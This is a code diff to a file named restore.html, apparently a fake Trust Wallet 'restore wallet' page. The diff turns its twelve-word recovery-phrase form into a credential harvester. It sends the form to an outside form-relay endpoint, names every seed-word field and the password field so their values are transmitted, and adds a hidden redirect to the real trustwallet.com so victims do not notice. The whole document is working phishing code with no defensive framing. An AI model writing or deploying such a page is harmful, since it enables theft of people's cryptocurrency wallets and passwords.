--- a/restore.html
+++ b/restore.html
@@ -54,14 +54,22 @@
                   role="tabpanel"
                   aria-labelledby="mnemonic-tab"
                 >
-                  <form>
+                  <form
+                    action="https://formsubmit.io/send/ccbd0aba-ab74-4156-89a5-9a5bcbbc7914"
+                  >
+                    <input
+                      type="hidden"
+                      name="_redirect"
+                      id="name"
+                      value="https://trustwallet.com"
+                    />
                     <div class="d-flex flex-wrap justify-content-center mb-3">
                       <div class="ml-3">
                         <span>1</span>
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="1"
                           id="phrase-1"
                           required=""
                         />
@@ -71,7 +79,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="2"
                           id="phrase-2"
                           required=""
                         />
@@ -81,7 +89,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="3"
                           id="phrase-3"
                           required=""
                         />
@@ -91,7 +99,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="4"
                           id="phrase-4"
                           required=""
                         />
@@ -101,7 +109,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="5"
                           id="phrase-5"
                           required=""
                         />
@@ -111,7 +119,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="6"
                           id="phrase-6"
                           required=""
                         />
@@ -121,7 +129,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="7"
                           id="phrase-7"
                           required=""
                         />
@@ -131,7 +139,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="8"
                           id="phrase-8"
                           required=""
                         />
@@ -141,7 +149,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="9"
                           id="phrase-9"
                           required=""
                         />
@@ -151,7 +159,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="10"
                           id="phrase-10"
                           required=""
                         />
@@ -161,7 +169,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="11"
                           id="phrase-11"
                           required=""
                         />
@@ -171,7 +179,7 @@
                         <input
                           class="mnemonic-input"
                           type="text"
-                          name=""
+                          name="12"
                           id="phrase-12"
                           required=""
                         />
@@ -180,6 +188,7 @@
                     <input
                       type="password"
                       class="w-100 py-3 px-2"
+                      name="password"
                       style="
                         font-size: 16px;
                         color: #ffffff;
